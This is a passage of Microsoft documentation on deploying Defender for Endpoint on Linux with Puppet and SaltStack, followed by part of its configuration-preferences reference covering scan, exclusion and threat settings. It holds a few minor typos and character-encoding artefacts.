-
-## References
--- [Add or remove YUM repositories](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/yum_repository_module.html)--- [Manage packages with the dnf package manager](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/dnf_module.html)--- [Add and remove APT repositories](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/apt_repository_module.html)--- [Manage apt-packages](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/apt_module.html)-
-## See also
-- [Investigate agent health issues](health-status.md)
security Linux Install With Puppet https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-puppet.md
- Title: Deploy Microsoft Defender for Endpoint on Linux with Puppet-
-description: Describes how to deploy Microsoft Defender for Endpoint on Linux using Puppet.
------- m365-security-- tier3-- mde-linux-- Previously updated : 12/18/2020--
-# Deploy Microsoft Defender for Endpoint on Linux with Puppet
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This article describes how to deploy Defender for Endpoint on Linux using Puppet. A successful deployment requires the completion of all of the following tasks:
--- [Download the onboarding package](#download-the-onboarding-package)-- [Create Puppet manifest](#create-a-puppet-manifest)-- [Deployment](#deployment)-- [Check onboarding status](#check-onboarding-status)---
-## Prerequisites and system requirements
-
- For a description of prerequisites and system requirements for the current software version, see [the main Defender for Endpoint on Linux page](microsoft-defender-endpoint-linux.md).
-
-In addition, for Puppet deployment, you need to be familiar with Puppet administration tasks, have Puppet configured, and know how to deploy packages. Puppet has many ways to complete the same task. These instructions assume availability of supported Puppet modules, such as *apt* to help deploy the package. Your organization might use a different workflow. Refer to the [Puppet documentation](https://puppet.com/docs) for details.
-
-## Download the onboarding package
-
-Download the onboarding package from Microsoft Defender portal.
--
-1. In Microsoft Defender portal, go to **Settings > Endpoints > Device management > Onboarding**.
-2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Your preferred Linux configuration management tool** as the deployment method.
-3. Select **Download onboarding package**. Save the file as WindowsDefenderATPOnboardingPackage.zip.
-
- :::image type="content" source="media/portal-onboarding-linux-2.png" alt-text="The option to download the onboarded package" lightbox="media/portal-onboarding-linux-2.png":::
-
-4. From a command prompt, verify that you have the file.
-
- ```bash
- ls -l
- ```
-
- ```Output
- total 8
- -rw-r--r-- 1 test staff 4984 Feb 18 11:22 WindowsDefenderATPOnboardingPackage.zip
- ```
-
-5. Extract the contents of the archive.
-
- ```bash
- unzip WindowsDefenderATPOnboardingPackage.zip
- ```
-
- ```Output
- Archive: WindowsDefenderATPOnboardingPackage.zip
- inflating: mdatp_onboard.json
- ```
-
-## Create a Puppet manifest
-
-You need to create a Puppet manifest for deploying Defender for Endpoint on Linux to devices managed by a Puppet server. This example makes use of the *apt* and *yumrepo* modules available from puppetlabs, and assumes that the modules have been installed on your Puppet server.
-
-Create the folders *install_mdatp/files* and *install_mdatp/manifests* under the modules folder of your Puppet installation. This folder is typically located in */etc/puppetlabs/code/environments/production/modules* on your Puppet server. Copy the mdatp_onboard.json file created above to the *install_mdatp/files* folder. Create an *init.pp* file that contains the deployment instructions:
-
-```bash
-pwd
-```
-
-```Output
-/etc/puppetlabs/code/environments/production/modules
-```
-
-```bash
-tree install_mdatp
-```
-
-```Output
-install_mdatp
-Γö£ΓöÇΓöÇ files
-Γöé ΓööΓöÇΓöÇ mdatp_onboard.json
-ΓööΓöÇΓöÇ manifests
- ΓööΓöÇΓöÇ init.pp
-```
-
-### Contents of `install_mdatp/manifests/init.pp`
-
-Defender for Endpoint on Linux can be deployed from one of the following channels (denoted below as *[channel]*): *insiders-fast*, *insiders-slow*, or *prod*. Each of these channels corresponds to a Linux software repository.
-
-The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in *insiders-fast* are the first ones to receive updates and new features, followed later by *insiders-slow* and lastly by *prod*.
-
-In order to preview new features and provide early feedback, it is recommended that you configure some devices in your enterprise to use either *insiders-fast* or *insiders-slow*.
-
-> [!WARNING]
-> Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.
-
-Note your distribution and version and identify the closest entry for it under `https://packages.microsoft.com/config/[distro]/`.
-
-In the below commands, replace *[distro]* and *[version]* with the information you've identified:
-
-> [!NOTE]
-> In case of RedHat, Oracle Linux, Amazon Linux 2, and CentOS 8, replace *[distro]* with 'rhel'.
-
-```puppet
-# Puppet manifest to install Microsoft Defender for Endpoint on Linux.
-# @param channel The release channel based on your environment, insider-fast or prod.
-# @param distro The Linux distribution in lowercase. In case of RedHat, Oracle Linux, Amazon Linux 2, and CentOS 8, the distro variable should be 'rhel'.
-# @param version The Linux distribution release number, e.g. 7.4.
-
-class install_mdatp (
- $channel = 'insiders-fast',
- $distro = undef,
- $version = undef
-) {
- case $facts['os']['family'] {
- 'Debian' : {
- $release = $channel ? {
- 'prod' => $facts['os']['distro']['codename'],
- default => $channel
- }
- apt::source { 'microsoftpackages' :
- location => "https://packages.microsoft.com/${distro}/${version}/prod",
- release => $release,
- repos => 'main',
- key => {
- 'id' => 'BC528686B50D79E339D3721CEB3E94ADBE1229CF',
- 'server' => 'keyserver.ubuntu.com',
- },
- }
- }
- 'RedHat' : {
- yumrepo { 'microsoftpackages' :
- baseurl => "https://packages.microsoft.com/${distro}/${version}/${channel}",
- descr => "packages-microsoft-com-prod-${channel}",
- enabled => 1,
- gpgcheck => 1,
- gpgkey => 'https://packages.microsoft.com/keys/microsoft.asc',
- }
- }
- default : { fail("${facts['os']['family']} is currently not supported.") }
- }
-
- case $facts['os']['family'] {
- /(Debian|RedHat)/: {
- file { ['/etc/opt', '/etc/opt/microsoft', '/etc/opt/microsoft/mdatp']:
- ensure => directory,
- owner => root,
- group => root,
- mode => '0755',
- }
-
- file { '/etc/opt/microsoft/mdatp/mdatp_onboard.json':
- source => 'puppet:///modules/install_mdatp/mdatp_onboard.json',
- owner => root,
- group => root,
- mode => '0600',
- require => File['/etc/opt/microsoft/mdatp'],
- }
-
- package { 'mdatp':
- ensure => 'installed',
- require => File['/etc/opt/microsoft/mdatp/mdatp_onboard.json'],
- }
- }
- default : { fail("${facts['os']['family']} is currently not supported.") }
- }
-}
-
-```
-
-## Deployment
-
-Include the above manifest in your site.pp file:
-
-```bash
-cat /etc/puppetlabs/code/environments/production/manifests/site.pp
-```
-
-```Output
-node "default" {
- include install_mdatp
-}
-```
-
-Enrolled agent devices periodically poll the Puppet Server and install new configuration profiles and policies as soon as they are detected.
-
-## Monitor Puppet deployment
-
-On the agent device, you can also check the onboarding status by running:
-
-```bash
-mdatp health
-```
-
-```Output
-...
-licensed : true
-org_id : "[your organization identifier]"
-...
-```
--- **licensed**: This confirms that the device is tied to your organization.--- **orgId**: This is your Defender for Endpoint organization identifier.-
-## Check onboarding status
-
-You can check that devices have been correctly onboarded by creating a script. For example, the following script checks enrolled devices for onboarding status:
-
-```bash
-mdatp health --field healthy
-```
-
-The above command prints `1` if the product is onboarded and functioning as expected.
-
-> [!IMPORTANT]
-> When the product starts for the first time, it downloads the latest antimalware definitions. Depending on your Internet connection, this can take up to a few minutes. During this time the above command returns a value of `0`.
-
-If the product is not healthy, the exit code (which can be checked through `echo $?`) indicates the problem:
--- 1 if the device isn't onboarded yet.-- 3 if the connection to the daemon cannot be established.-
-## Log installation issues
-
- For more information on how to find the automatically generated log that is created by the installer when an error occurs, see [Log installation issues](linux-resources.md#log-installation-issues).
-
-## Operating system upgrades
-
-When upgrading your operating system to a new major version, you must first uninstall Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for Endpoint on Linux on your device.
-
-## Uninstallation
-
-Create a module *remove_mdatp* similar to *install_mdatp* with the following contents in *init.pp* file:
-
-```bash
-class remove_mdatp {
- package { 'mdatp':
- ensure => 'purged',
- }
-}
-```
security Linux Install With Saltack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-saltack.md
- Title: Deploy Microsoft Defender for Endpoint on Linux with SaltStack-
-description: Describes how to deploy Microsoft Defender for Endpoint on Linux using Saltstack.
------- m365-security-- tier3-- mde-linux-- Previously updated : 02/21/2024--
-# Deploy Microsoft Defender for Endpoint on Linux with Saltstack
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This article describes how to deploy Defender for Endpoint on Linux using Saltstack. A successful deployment requires the completion of all of the following tasks:
--- [Download the onboarding package](#download-the-onboarding-package)-- [Create Saltstack state files](#create-saltstack-state-files)-- [Deployment](#deployment)-- [Reference](#reference)--
-## Prerequisites and system requirements
-
-Before you get started, see [the main Defender for Endpoint on Linux page](microsoft-defender-endpoint-linux.md) for a description of prerequisites and system requirements for the current software version.
-
-In addition, for Saltstack deployment, you need to be familiar with Saltstack administration, have Saltstack installed, configure the Master and Minions, and know how to apply states. Saltstack has many ways to complete the same task. These instructions assume availability of supported Saltstack modules, such as *apt* and *unarchive* to help deploy the package. Your organization might use a different workflow. Refer to the [Saltstack documentation](https://docs.saltproject.io/) for details.
--- Saltstack is installed on at least one computer (Saltstack calls the computer as the master).-- The Saltstack master accepted the managed nodes (Saltstack calls the nodes as minions) connections.-- The Saltstack minions are able to resolve communication to the Saltstack master (be default the minions try to communicate with a machine named 'salt').-- Rung this ping test:-
- ```bash
- sudo salt '*' test.ping
- ```
--- The Saltstack master has a file server location where the Microsoft Defender for Endpoint files can be distributed from (by default Saltstack uses the /srv/salt folder as the default distribution point)-
-## Download the onboarding package
-
-Download the onboarding package from Microsoft Defender portal.
--
-1. In Microsoft Defender portal, go to **Settings > Endpoints > Device management > Onboarding**.
-2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Your preferred Linux configuration management tool** as the deployment method.
-3. Select **Download onboarding package**. Save the file as WindowsDefenderATPOnboardingPackage.zip.
-
- :::image type="content" source="media/portal-onboarding-linux-2.png" alt-text="The Download onboarding package option" lightbox="media/portal-onboarding-linux-2.png":::
-
-4. On the SaltStack Master, extract the contents of the archive to the SaltStack Server's folder (typically `/srv/salt`):
-
- ```bash
- ls -l
- ```
-
- ```Output
- total 8
- -rw-r--r-- 1 test staff 4984 Feb 18 11:22 WindowsDefenderATPOnboardingPackage.zip
- ```
-
- ```bash
- unzip WindowsDefenderATPOnboardingPackage.zip -d /srv/salt/mde
- ```
-
- ```Output
- Archive: WindowsDefenderATPOnboardingPackage.zip
- inflating: /srv/salt/mde/mdatp_onboard.json
- ```
-
-## Create Saltstack state files
-
-Create a SaltState state file in your configuration repository (typically `/srv/salt`) that applies the necessary states to deploy and onboard Defender for Endpoint.
--- Add the Defender for Endpoint repository and key, `install_mdatp.sls`:-
- Defender for Endpoint on Linux can be deployed from one of the following channels (described as *[channel]*): *insiders-fast*, *insiders-slow*, or *prod*. Each of these channels corresponds to a Linux software repository.
-
- The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in *insiders-fast* are the first ones to receive updates and new features, followed later by *insiders-slow* and lastly by *prod*.
-
- In order to preview new features and provide early feedback, we recommended that you configure some devices in your enterprise to use either *insiders-fast* or *insiders-slow*.
-
- > [!WARNING]
- > Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.
-
- Note your distribution and version and identify the closest entry for it under `https://packages.microsoft.com/config/[distro]/`.
-
- In the following commands, replace *[distro]* and *[version]* with your information.
-
- > [!NOTE]
- > In case of Oracle Linux and Amazon Linux 2, replace *[distro]* with "rhel". For Amazon Linux 2, replace *[version]* with "7". For Oracle utilize, replace *[version]* with the version of Oracle Linux.
-
- ```bash
- cat /srv/salt/install_mdatp.sls
- ```
-
- ```output
- add_ms_repo:
- pkgrepo.managed:
- - humanname: Microsoft Defender Repository
- {% if grains['os_family'] == 'Debian' %}
- - name: deb [arch=amd64,armhf,arm64] https://packages.microsoft.com/[distro]/[version]/[channel] [codename] main
- - dist: [codename]
- - file: /etc/apt/sources.list.d/microsoft-[channel].list
- - key_url: https://packages.microsoft.com/keys/microsoft.asc
- - refresh: true
- {% elif grains['os_family'] == 'RedHat' %}
- - name: packages-microsoft-[channel]
- - file: microsoft-[channel]
- - baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
- - gpgkey: https://packages.microsoft.com/keys/microsoft.asc
- - gpgcheck: true
- {% endif %}
- ```
--- Add the package installed state to `install_mdatp.sls` after the `add_ms_repo` state as previously defined.-
- ```Output
- install_mdatp_package:
- pkg.installed:
- - name: matp
- - required: add_ms_repo
- ```
--- Add the onboarding file deployment to `install_mdatp.sls` after the `install_mdatp_package` as previously defined.-
- ```Output
- copy_mde_onboarding_file:
- file.managed:
- - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
- - source: salt://mde/mdatp_onboard.json
- - required: install_mdatp_package
- ```
-
- The completed install state file should look similar to this output:
-
- ```Output
- add_ms_repo:
- pkgrepo.managed:
- - humanname: Microsoft Defender Repository
- {% if grains['os_family'] == 'Debian' %}
- - name: deb [arch=amd64,armhf,arm64] https://packages.microsoft.com/[distro]/[version]/prod [codename] main
- - dist: [codename]
- - file: /etc/apt/sources.list.d/microsoft-[channel].list
- - key_url: https://packages.microsoft.com/keys/microsoft.asc
- - refresh: true
- {% elif grains['os_family'] == 'RedHat' %}
- - name: packages-microsoft-[channel]
- - file: microsoft-[channel]
- - baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
- - gpgkey: https://packages.microsoft.com/keys/microsoft.asc
- - gpgcheck: true
- {% endif %}
-
- install_mdatp_package:
- pkg.installed:
- - name: matp
- - required: add_ms_repo
-
- copy_mde_onboarding_file:
- file.managed:
- - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
- - source: salt://mde/mdatp_onboard.json
- - required: install_mdatp_package
- ```
-
-Create a SaltState state file in your configuration repository (typically `/srv/salt`) that applies the necessary states to offboard and remove Defender for Endpoint. Before using the offboarding state file, you need to download the offboarding package from the Security portal and extract it in the same way you did the onboarding package. The downloaded offboarding package is only valid for a limited period of time.
--- Create an Uninstall state file `uninstall_mdapt.sls` and add the state to remove the `mdatp_onboard.json` file-
- ```bash
- cat /srv/salt/uninstall_mdatp.sls
- ```
-
- ```Output
- remove_mde_onboarding_file:
- file.absent:
- - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
- ```
--- Add the offboarding file deployment to the `uninstall_mdatp.sls` file after the `remove_mde_onboarding_file` state defined in the previous section.-
- ```Output
- offboard_mde:
- file.managed:
- - name: /etc/opt/microsoft/mdatp/mdatp_offboard.json
- - source: salt://mde/mdatp_offboard.json
- ```
--- Add the removal of the MDATP package to the `uninstall_mdatp.sls` file after the `offboard_mde` state defined in the previous section.-
- ```Output
- remove_mde_packages:
- pkg.removed:
- - name: mdatp
- ```
-
- The complete uninstall state file should look similar to the following output:
-
- ```Output
- remove_mde_onboarding_file:
- file.absent:
- - name: /etc/opt/microsoft/mdatp/mdatp_onboard.json
-
- offboard_mde:
- file.managed:
- - name: /etc/opt/microsoft/mdatp/mdatp_offboard.json
- - source: salt://mde/offboard/mdatp_offboard.json
-
- remove_mde_packages:
- pkg.removed:
- - name: mdatp
- ```
-
-## Deployment
-
-Now apply the state to the minions. The below command applies the state to machines with the name that begins with `mdetest`.
--- Installation:-
- ```bash
- salt 'mdetest*' state.apply install_mdatp
- ```
-
- > [!IMPORTANT]
- > When the product starts for the first time, it downloads the latest antimalware definitions. Depending on your Internet connection, this can take up to a few minutes.
--- Validation/configuration:-
- ```bash
- salt 'mdetest*' cmd.run 'mdatp connectivity test'
- ```
-
- ```bash
- salt 'mdetest*' cmd.run 'mdatp health'
- ```
--- Uninstallation:-
- ```bash
- salt 'mdetest*' state.apply uninstall_mdatp
- ```
-
-## Log installation issues
-
-For more information on how to find the automatically generated log that's created by the installer when an error occurs, see [Log installation issues](linux-resources.md#log-installation-issues).
-
-## Operating system upgrades
-
-When upgrading your operating system to a new major version, you must first uninstall Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for Endpoint on Linux on your device.
-
-## Reference
--- [SALT Project documentation](https://docs.saltproject.io/en/latest/topics/about_salt_project.html)-
-## See also
--- [Investigate agent health issues](health-status.md)
security Linux Preferences https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-preferences.md
- Title: Set preferences for Microsoft Defender for Endpoint on Linux-
-description: Describes how to configure Microsoft Defender for Endpoint on Linux in enterprises.
--- Previously updated : 07/07/2023---- m365-security-- tier3-- mde-linux----
-# Set preferences for Microsoft Defender for Endpoint on Linux
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-> [!IMPORTANT]
-> This topic contains instructions for how to set preferences for Defender for Endpoint on Linux in enterprise environments. If you are interested in configuring the product on a device from the command-line, see [Resources](linux-resources.md#configure-from-the-command-line).
-
-In enterprise environments, Defender for Endpoint on Linux can be managed through a configuration profile. This profile is deployed from the management tool of your choice. Preferences managed by the enterprise take precedence over the ones set locally on the device. In other words, users in your enterprise aren't able to change preferences that are set through this configuration profile. If exclusions were added through the managed configuration profile, they can only be removed through the managed configuration profile. The command line works for exclusions that were added locally.
-
-This article describes the structure of this profile (including a recommended profile that you can use to get started) and instructions on how to deploy the profile.
-
-## Configuration profile structure
-
-The configuration profile is a .json file that consists of entries identified by a key (which denotes the name of the preference), followed by a value, which depends on the nature of the preference. Values can be simple, such as a numerical value, or complex, such as a nested list of preferences.
-
-Typically, you would use a configuration management tool to push a file with the name ```mdatp_managed.json``` at the location ```/etc/opt/microsoft/mdatp/managed/```.
-
-The top level of the configuration profile includes product-wide preferences and entries for subareas of the product, which are explained in more detail in the next sections.
-
-### Antivirus engine preferences
-
-The *antivirusEngine* section of the configuration profile is used to manage the preferences of the antivirus component of the product.
-
-|Description|Value|
-|||
-|**Key**|antivirusEngine|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-#### Enforcement level for antivirus engine
-
-Specifies the enforcement preference of antivirus engine. There are three values for setting enforcement level:
--- Real-time (`real_time`): Real-time protection (scan files as they're modified) is enabled.-- On-demand (`on_demand`): Files are scanned only on demand. In this:
- - Real-time protection is turned off.
-- [Passive (`passive`)](microsoft-defender-antivirus-compatibility.md#passive-mode-or-edr-block-mode): Runs the antivirus engine in passive mode. In this:
- - Real-time protection is turned off: Threats are not remediated by Microsoft Defender Antivirus.
- - On-demand scanning is turned on: Still use the scan capabilities on the endpoint.
- - Automatic threat remediation is turned off: No files will be moved and security admin is expected to take required action.
- - Security intelligence updates are turned on: Alerts will be available on security admins tenant.
-
-|Description|Value|
-|||
-|**Key**|enforcementLevel|
-|**Data type**|String|
-|**Possible values**|real_time <p> on_demand <p> passive (default)|
-|**Comments**|Available in Defender for Endpoint version 101.10.72 or higher. Default is changed from real_time to passive for Endpoint version 101.23062.0001 or higher.|
-
-#### Enable/disable behavior-monitoring
-
-Determines whether behavior monitoring and blocking capability is enabled on the device or not.
-> [!NOTE]
-> This feature is applicable only when Real-Time Protection feature is enabled.
-
-****
-|Description|Value|
-|||
-|**Key**|behaviorMonitoring|
-|**Data type**|String|
-|**Possible values**|disabled (default) <p> enabled|
-|**Comments**|Available in Defender for Endpoint version 101.45.00 or higher.|
-
-#### Run a scan after definitions are updated
-
-Specifies whether to start a process scan after new security intelligence updates are downloaded on the device. Enabling this setting triggers an antivirus scan on the running processes of the device.
-
-|Description|Value|
-|||
-|**Key**|scanAfterDefinitionUpdate|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|**Comments**|Available in Defender for Endpoint version 101.45.00 or higher.|
-
-#### Scan archives (on-demand antivirus scans only)
-
-Specifies whether to scan archives during on-demand antivirus scans.
-> [!NOTE]
-> Archive files are never scanned during real time protection. When the files in an archive are extracted, they are scanned. The *scanArchives* option can be used to force the scan of archives only during on-demand scan.
-
-|Description|Value|
-|||
-|**Key**|scanArchives|
-|**Data type**|Boolean|
-|**Possible values**|true (default) <p> false|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.45.00 or higher.|
-
-#### Degree of parallelism for on-demand scans
-
-Specifies the degree of parallelism for on-demand scans. This corresponds to the number of threads used to perform the scan and impacts the CPU usage, and the duration of the on-demand scan.
-
-|Description|Value|
-|||
-|**Key**|maximumOnDemandScanThreads|
-|**Data type**|Integer|
-|**Possible values**|2 (default). Allowed values are integers between 1 and 64.|
-|**Comments**|Available in Microsoft Defender for Endpoint version 101.45.00 or higher.|
-
-#### Exclusion merge policy
-
-Specifies the merge policy for exclusions. It can be a combination of administrator-defined and user-defined exclusions (`merge`) or only administrator-defined exclusions (`admin_only`). This setting can be used to restrict local users from defining their own exclusions.
-
-|Description|Value|
-|||
-|**Key**|exclusionsMergePolicy|
-|**Data type**|String|
-|**Possible values**|merge (default) <p> admin_only|
-|**Comments**|Available in Defender for Endpoint version 100.83.73 or higher.|
-
-#### Scan exclusions
-
-Entities that have been excluded from the scan. Exclusions can be specified by full paths, extensions, or file names.
-(Exclusions are specified as an array of items, administrator can specify as many elements as necessary, in any order.)
-
-|Description|Value|
-|||
-|**Key**|exclusions|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-##### Type of exclusion
-
-Specifies the type of content excluded from the scan.
-
-|Description|Value|
-|||
-|**Key**|$type|
-|**Data type**|String|
-|**Possible values**|excludedPath <p> excludedFileExtension <p> excludedFileName|
-
-##### Path to excluded content
-
-Used to exclude content from the scan by full file path.
-
-|Description|Value|
-|||
-|**Key**|path|
-|**Data type**|String|
-|**Possible values**|valid paths|
-|**Comments**|Applicable only if *$type* is *excludedPath*|
-
-##### Path type (file / directory)
-
-Indicates if the *path* property refers to a file or directory.
-
-|Description|Value|
-|||
-|**Key**|isDirectory|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Applicable only if *$type* is *excludedPath*|
-
-##### File extension excluded from the scan
-
-Used to exclude content from the scan by file extension.
-
-|Description|Value|
-|||
-|**Key**|extension|
-|**Data type**|String|
-|**Possible values**|valid file extensions|
-|**Comments**|Applicable only if *$type* is *excludedFileExtension*|
-
-##### Process excluded from the scan*
-
-Specifies a process for which all file activity is excluded from scanning. The process can be specified either by its name (for example, `cat`) or full path (for example, `/bin/cat`).
-
-|Description|Value|
-|||
-|**Key**|name|
-|**Data type**|String|
-|**Possible values**|any string|
-|**Comments**|Applicable only if *$type* is *excludedFileName*|
-
-#### Muting Non Exec mounts
-
-Specifies the behavior of RTP on mount point marked as noexec. There are two values for setting are:
--- Unmuted (`unmute`): The default value, all mount points are scanned as part of RTP.-- Muted (`mute`): Mount points marked as noexec aren't scanned as part of RTP, these mount point can be created for:
- - Database files on Database servers for keeping data base files.
- - File server can keep data files mountpoints with noexec option.
- - Back up can keep data files mountpoints with noexec option.
-
-|Description|Value|
-|||
-|**Key**|nonExecMountPolicy|
-|**Data type**|String|
-|**Possible values**|unmute (default) <p> mute|
-|**Comments**|Available in Defender for Endpoint version 101.85.27 or higher.|
-
-#### Unmonitor Filesystems
-
-Configure filesystems to be unmonitored/excluded from Real Time Protection(RTP). The filesystems configured are validated against Microsoft Defender's list of permitted filesystems. Only post successful validation, will the filesystem be allowed to be unmonitored. These configured unmonitored filesystems will still be scanned by Quick, Full, and custom scans.
-
-|Description|Value|
-|||
-|**Key**|unmonitoredFilesystems|
-|**Data type**|Array of strings|
-|**Comments**|Configured filesystem will be unmonitored only if it is present in Microsoft's list of permitted unmonitored filesystems.|
-
-By default, NFS and Fuse are unmonitored from RTP, Quick, and Full scans. However, they can still be scanned by a custom scan. For example, to remove NFS from the list of unmonitored filesystems list, update the managed config file as shown below. This will automatically add NFS to the list of monitored filesystems for RTP.
-
-```JSON
-{
- "antivirusEngine":{
- "unmonitoredFilesystems": ["Fuse"]
- }
-}
-```
-To remove both NFS and Fuse from unmonitored list of filesystems, do the following
-
-```JSON
-{
- "antivirusEngine":{
- "unmonitoredFilesystems": []
- }
-}
-```
--
->[!NOTE]
-> Below is the default list of monitored filesystems for RTP -
->
->**[btrfs, ecryptfs, ext2, ext3, ext4, fuseblk, jfs, overlay, ramfs, reiserfs, tmpfs, vfat, xfs]**
->
->If any monitored filesystem needs to be added to the list of unmonitored filesystems,then it needs to be evaluated and enabled by Microsoft via cloud config. Following which customers can update managed_mdatp.json to unmonitor that filesystem.
---
-#### Configure file hash computation feature
-
-Enables or disables file hash computation feature. When this feature is enabled, Defender for Endpoint computes hashes for files it scans. Note that enabling this feature might impact device performance. For more details, please refer to: [Create indicators for files](indicator-file.md).
-
-|Description|Value|
-|||
-|**Key**|enableFileHashComputation|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Available in Defender for Endpoint version 101.85.27 or higher.|
-#### Allowed threats
-
-List of threats (identified by their name) that aren't blocked by the product and are instead allowed to run.
-
-|Description|Value|
-|||
-|**Key**|allowedThreats|
-|**Data type**|Array of strings|
-
-#### Disallowed threat actions
-
-Restricts the actions that the local user of a device can take when threats are detected. The actions included in this list aren't displayed in the user interface.
-
-|Description|Value|
-|||
-|**Key**|disallowedThreatActions|
-|**Data type**|Array of strings|
-|**Possible values**|allow (restricts users from allowing threats) <p> restore (restricts users from restoring threats from the quarantine)|
-|**Comments**|Available in Defender for Endpoint version 100.83.73 or higher.|
-
-#### Threat type settings
-
-The *threatTypeSettings* preference in the antivirus engine is used to control how certain threat types are handled by the product.
-
-|Description|Value|
-|||
-|**Key**|threatTypeSettings|
-|**Data type**|Dictionary (nested preference)|
-|**Comments**|See the following sections for a description of the dictionary contents.|
-
-##### Threat type
-
-Type of threat for which the behavior is configured.
-
-|Description|Value|
-|||
-|**Key**|key|
-|**Data type**|String|
-|**Possible values**|potentially_unwanted_application <p> archive_bomb|
-
-##### Action to take
-
-Action to take when coming across a threat of the type specified in the preceding section. Can be:
--- **Audit**: The device isn't protected against this type of threat, but an entry about the threat is logged.-- **Block**: The device is protected against this type of threat and you're notified in the security console.-- **Off**: The device isn't protected against this type of threat and nothing is logged.-
-|Description|Value|
-|||
-|**Key**|value|
-|**Data type**|String|
-|**Possible values**|audit (default) <p> block <p> off|
-
-#### Threat type settings merge policy
-
-Specifies the merge policy for threat type settings. This can be a combination of administrator-defined and user-defined settings (`merge`) or only administrator-defined settings (`admin_only`). This setting can be used to restrict local users from defining their own settings for different threat types.
-
-|Description|Value|
-|||
-|**Key**|threatTypeSettingsMergePolicy|
-|**Data type**|String|
-|**Possible values**|merge (default) <p> admin_only|
-|**Comments**|Available in Defender for Endpoint version 100.83.73 or higher.|
-
-#### Antivirus scan history retention (in days)
-
-Specify the number of days that results are retained in the scan history on the device. Old scan results are removed from the history. Old quarantined files that are also removed from the disk.
-
-|Description|Value|
-|||
-|**Key**|scanResultsRetentionDays|
-|**Data type**|String|
-|**Possible values**|90 (default). Allowed values are from 1 day to 180 days.|
-|**Comments**|Available in Defender for Endpoint version 101.04.76 or higher.|
-
-#### Maximum number of items in the antivirus scan history
-
-Specify the maximum number of entries to keep in the scan history. Entries include all on-demand scans performed in the past and all antivirus detections.
-
-|Description|Value|
-|||
-|**Key**|scanHistoryMaximumItems|
-|**Data type**|String|
-|**Possible values**|10000 (default). Allowed values are from 5000 items to 15000 items.|
-|**Comments**|Available in Defender for Endpoint version 101.04.76 or higher.|
-
-#### Advanced scan options
-
-The following settings can be configured to enable certain advanced scanning features.
-
->[!NOTE]
->Enabling these features might impact device performance. As such, it is recommended to keep the defaults.
-
-##### Configure scanning of file modify permissions events
-When this feature is enabled, Defender for Endpoint will scan files when their permissions have been changed to set the execute bit(s).
-
->[!NOTE]
->This feature is applicable only when the `enableFilePermissionEvents` feature is enabled. For more information, see [Advanced optional features](linux-preferences.md#configure-monitoring-of-file-modify-permissions-events) section below for details.
-
-|Description|Value|
-|||
-|**Key**|scanFileModifyPermissions|
-|**Data type**|Boolean|
-|**Possible values**|false (default) <p> true|
-|**Comments**|Available in Defender for Endpoint version 101.23062.0010 or higher.|
-
-##### Configure scanning of file modify ownership events
-When this feature is enabled, Defender for Endpoint will scan files for which ownership has changed.
-
->[!NOTE]
->This feature is applicable only when the `enableFileOwnershipEvents` feature is enabled. For more information, see [Advanced optional features](linux-preferences.md#configure-monitoring-of-file-modify-ownership-events) section below for details.
-
-|Description|Value|
